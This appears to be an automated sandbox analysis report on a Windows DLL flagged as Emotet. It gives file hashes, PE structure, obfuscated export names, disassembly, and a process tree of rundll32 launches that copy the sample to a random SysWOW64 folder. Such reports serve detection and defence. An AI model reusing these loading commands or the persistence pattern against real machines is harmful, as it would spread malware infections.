MD5:	6E32ABF681704B6F1B5E4285D3965238
SHA1:	9103EE43F5F37AA2E02E3AD125FA65B1972BD36C
SHA-256:	6895D9D49A84C91F1DAC5321B3B55008B457FA2584ED10642CE4FA490EAE4637
SHA-512:	8F7B6D7838D56AD9C322B599E773A3522F336BC3D0E5B49B38B05AC8872A0A600D7AD49910590C6D0A387A880A909FE9688D010A8BA08EF9A5DE1A3793333EE3
Malicious:	false
Preview:	MDMP....... .......XP.a............4...............H.......$...........................`.......8...........T...........@................................................................................................U...........B......p.......GenuineIntelW...........T............O.a5............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF470.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8302
Entropy (8bit):	3.6937495262771307
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiYG6eB6YFPSUZvzvYgmfL8GSFCpDc89bzYsfCRRm:RrlsNip6g6YtSUhzQgmfLrSszLfC2
MD5:	E7787FE4AD76CF7BFC11A2F71CDBF514
SHA1:	7A330087A1D749AB5231B847EACCC12D29128CC5
SHA-256:	9E91EB6D12CD9BFB03B903A332593745E347A646F2ECF66A959EA8A09189F4C3
SHA-512:	4C13F833DF7C5BFCAD4686C1C8BFDA9BCBE90931F59AD115BCD4277D5DFA6F5B091D8BAB51F47C15F6C5BBE0C0C2B901B28FF95171E9D4CD89C9ABEFE8DB2935
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7EC.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4558
Entropy (8bit):	4.43323153844137
Encrypted:	false
SSDEEP:	48:cvIwSD8zs6JgtWI95lWSC8Ba8fm8M4J2yGtFdAo+q84tjhKcQIcQwQUd:uITfI2USNRJEVAoxhKkwQUd
MD5:	8BBF39B2A89D619397327A2E60A60953
SHA1:	FD745102E02BC303AD054DE1EF8A46DF80DFC1CE
SHA-256:	1E7BD9401AC227DF593C760F181386523FD7067A762F53266024BBBCA7CB1D34
SHA-512:	63027E2227DFA5827CC41C2530328D26C814CF381D63BBE94D1B64406BAAF700207D296A3148A33DD824BA1EEF9329279418699D6C92F01F335E5CC1FDD65F4F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279560" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.271262820355482
Encrypted:	false
SSDEEP:	12288:zUgsDNYix9xAgG9z7VhMLQyKhevdwNnBtxGawapXXii4hJdkEpgD+:wgsDNYix9xAgG9gU
MD5:	B489DEF7D70B07066828670FAA276F31
SHA1:	1A0915DC698FCFB1E62A5440685815852AF78120
SHA-256:	EFB419732C122958CC9AA6B0E9507B2B0F5849AFC95D868E58D02D834D8DEFC6
SHA-512:	613F301EEAFB8FE7B86925B976B18D58AF38873FC2810896E8B62C1BF7C6679D94921284C7BB7BA9B65D78E5FE54EDF32ACDBF5C1313BE987FA2575D3BBA040E
Malicious:	false
Preview:	regf[...[...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.wB.7................................................................................................................................................................................................................................................................................................................................................#F.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.3969616120920665
Encrypted:	false
SSDEEP:	192:vp50I8i1Zynhu29GCYI5FSEsWftx1YxgoJ4XPaJNSdkyFn6yvRrsfGdWfYjdsiD3:/rM5Rftx1YPJ4XP7FFn7XZd1DoXzCz
MD5:	B4403645932E719748C42ED4B39083EF
SHA1:	CC150B5083BB44E264F7585E2B49CAE962313959
SHA-256:	E24CD789B01869D6D6EFA1EB2E04990791EB811433FDE90665A08014D86ADB8E
SHA-512:	B4CDF911F406337159FFCCA5C7211B22E5E05388BDE104E424085AFA815FB1A86AD6A155A338867207B1713BFEFA5AD942970D2014DC5F67F76B7DAB0338783D
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.wB.7................................................................................................................................................................................................................................................................................................................................................#F.HvLE.>......Z.............-..E..H>.T...A.........0..............hbin................p.\..,..........nk,.E.D.7................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .E.D.7....... ........................... .......Z.......................Root........lf......Root....nk .E.D.7....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.970978880732997
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6zAcNlJXo7.dll
File size:	387072
MD5:	c7e23f2764d6ed9b59b0fed69a4488b0
SHA1:	67f31b13485f91be7952b3df5628f14ef1c86a38
SHA256:	d048f196a39fc7dae500b057fa000ebbb81ae2e6c18b4ddff445e8d7163f20ab
SHA512:	1184f739b241155c46fda5c005af5010de100dd50f406965ae39701029a8304810359cc85e589eefc3afa494c3204fb467691b3f0b23c74eb32be26f3a4ca927
SSDEEP:	6144:zBYrPMTsY8GR3j4fubnY6Zs/Bv6yGM6aSTsfA2qL6jpXNcc6CEteuQJPIgtlpZ5L:yhmT4GbnYks/BJGNWo2LjpScDEteuOIi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1001cac1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A73B52 [Wed Dec 1 09:07:30 2021 UTC]
TLS Callbacks:	0x1000c340
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	609402ef170a35cc0e660d7d95ac10ce

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F8E50B13BC7h
call 00007F8E50B13F58h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F8E50B13A73h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F8E50B1446Eh
pop ecx
pop ebp
ret
push ebp
mov ebp, esp
jmp 00007F8E50B13BCFh
push dword ptr [ebp+08h]
call 00007F8E50B17F54h
pop ecx
test eax, eax
je 00007F8E50B13BD1h
push dword ptr [ebp+08h]
call 00007F8E50B17FD0h
pop ecx
test eax, eax
je 00007F8E50B13BA8h
pop ebp
ret
cmp dword ptr [ebp+08h], FFFFFFFFh
je 00007F8E50B14533h
jmp 00007F8E50B14510h
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1002A08Ch]
push dword ptr [ebp+08h]
call dword ptr [1002A088h]
push C0000409h
call dword ptr [1002A040h]
push eax
call dword ptr [1002A090h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [1002A094h]
test eax, eax
je 00007F8E50B13BC7h
push 00000002h
pop ecx
int 29h
mov dword ptr [1005E278h], eax
mov dword ptr [1005E274h], ecx
mov dword ptr [1005E270h], edx
mov dword ptr [1005E26Ch], ebx
mov dword ptr [1005E268h], esi
mov dword ptr [1005E264h], edi
mov word ptr [eax], es

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5b590	0x614	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5bba4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x60000	0x1bc0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5a1dc	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5a300	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a230	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28bb4	0x28c00	False	0.53924822661	data	6.1540438823	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x32362	0x32400	False	0.817810362251	data	7.40645886779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x1ba4	0x1200	False	0.287109375	data	2.60484752417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0x5f000	0x4c4	0x600	False	0.360677083333	AmigaOS bitmap font	2.17228109861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x60000	0x1bc0	0x1c00	False	0.7880859375	data	6.62631718459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer

USER32.dll

GetDC, ReleaseDC, GetWindowRect

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x100010a0
axamexdrqyrgb	2	0x100017b0
bhramccfbdd	3	0x10001690
bptyjtyr	4	0x10001640
bxoqrnuua	5	0x100016c0
cegjceivzmgdcffk	6	0x100014e0
cgxpyqfkocm	7	0x10001480
chjbtsnqmvl	8	0x10001540
crfsijq	9	0x10001730
empxfws	10	0x10001590
fbgcvvbrlowsjsj	11	0x10001550
fjhmprw	12	0x10001660
gfqdajfucnxrv	13	0x10001850
hcloldazhuvj	14	0x10001790
idcumrbybo	15	0x10001500
ihvpwdsfllpvrzy	16	0x10001750
iuzqizpdhxqkmf	17	0x100014c0
jaarlqsruhrwpipt	18	0x100016e0
jndshbhgxdkvvtj	19	0x10001600
jniijdleqsyajeis	20	0x10001650
jtjqgma	21	0x100016f0
kffxtbzhfgbqlu	22	0x10001630
kwxkzdhqe	23	0x100016d0
lidhnvsukgiuabh	24	0x100016b0
ltcrkednwfkup	25	0x10001820
lvrmqgtvhsegpbvmq	26	0x10001770
mxvwvnerswyylp	27	0x10001520
ndlmbjceavqdintmv	28	0x100017d0
nvnriipkwrmxwsu	29	0x10001510
oafxfavxmi	30	0x10001570
ocwutlohg	31	0x100014b0
olcklbdvo	32	0x10001680
pawvqfmiz	33	0x100015e0
pdmomnjmmryopqza	34	0x10001560
plzkvjcbz	35	0x10001710
poasqvltrkgvepng	36	0x10001840
psjoyjhsrkg	37	0x100015b0
qdimtzieldbl	38	0x10001620
qzvngjfyuxpjag	39	0x10001580
relsounb	40	0x100016a0
rykebhcisi	41	0x10001670
snrvgvzpjh	42	0x100017c0
sqnfcfmocgbg	43	0x10001740
sxgllzweihxqxi	44	0x10001760
tgagxhhcfj	45	0x10001780
thjyvtvttwpah	46	0x10001830
uvypobslemtipv	47	0x10001640
vgidwtjsbwpxkdxj	48	0x100017a0
wahhdker	49	0x100014a0
wamqmispvbxt	50	0x100015f0
witvsjavqyw	51	0x10001720
wopabadcwdizvwlgk	52	0x10001490
wpzyecljz	53	0x10001800
wukgfirfwilhu	54	0x100015d0
xntbmrrxs	55	0x100017f0
xsxwxreryufxwuhh	56	0x10001700
xvgdevijtw	57	0x10001610
ydvqidso	58	0x100015c0
yggdjrsewuw	59	0x100015a0
zaeqdmhaky	60	0x100017e0
zakvwkjnk	61	0x10001700
zqbggkzy	62	0x100014f0
zqtdpertk	63	0x100014d0
zshfybkvzv	64	0x10001810
zxxopqyvfoesyhmup	65	0x10001530

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4600 Parent PID: 4000

General

Start time:	20:46:33
Start date:	01/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll"
Imagebase:	0x1160000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.643248675.0000000000BB0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.662542522.0000000000BB0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.642444707.00000000013AC000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.695566646.00000000013AC000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.663733322.00000000013AC000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.662941579.00000000013AC000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.643478517.00000000013AC000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.641938795.0000000000BB0000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.663509938.0000000000BB0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6692 Parent PID: 4600

General

Start time:	20:46:33
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4520 Parent PID: 4600

General

Start time:	20:46:34
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000003.573611715.0000000000835000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.620846196.0000000000610000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4352 Parent PID: 6692

General

Start time:	20:46:34
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.610590191.00000000006DA000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.610563535.0000000000630000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6324 Parent PID: 4600

General

Start time:	20:46:38
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.633116457.0000000003380000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.633278452.00000000035DA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 160 Parent PID: 4600

General

Start time:	20:46:46
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.642741548.00000000031EA000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.642650507.0000000003180000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6712 Parent PID: 4352

General

Start time:	20:48:43
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5696 Parent PID: 4520

General

Start time:	20:48:44
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf",Yyhhzevh
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.770251757.0000000000A1A000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1304 Parent PID: 6324

General

Start time:	20:49:01
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5816 Parent PID: 572

General

Start time:	20:49:10
Start date:	01/12/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff70d6e0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5712 Parent PID: 160

General

Start time:	20:49:10
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 2984 Parent PID: 5816

General

Start time:	20:49:11
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 4412 Parent PID: 4600

General

Start time:	20:49:16
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 316
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 4764 Parent PID: 5816

General

Start time:	20:49:23
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4600 -ip 4600
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 2932 Parent PID: 4600

General

Start time:	20:49:25
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 324
Imagebase:	0xa80000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6104 Parent PID: 5696

General

Start time:	20:50:13
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL
Imagebase:	0xc20000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4600 Parent PID: 4000 loaddll32.exeCOMMON

Executed Functions

Function 00BCED95, Relevance: 9.1, Strings: 7, Instructions: 364
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00BCED95() {
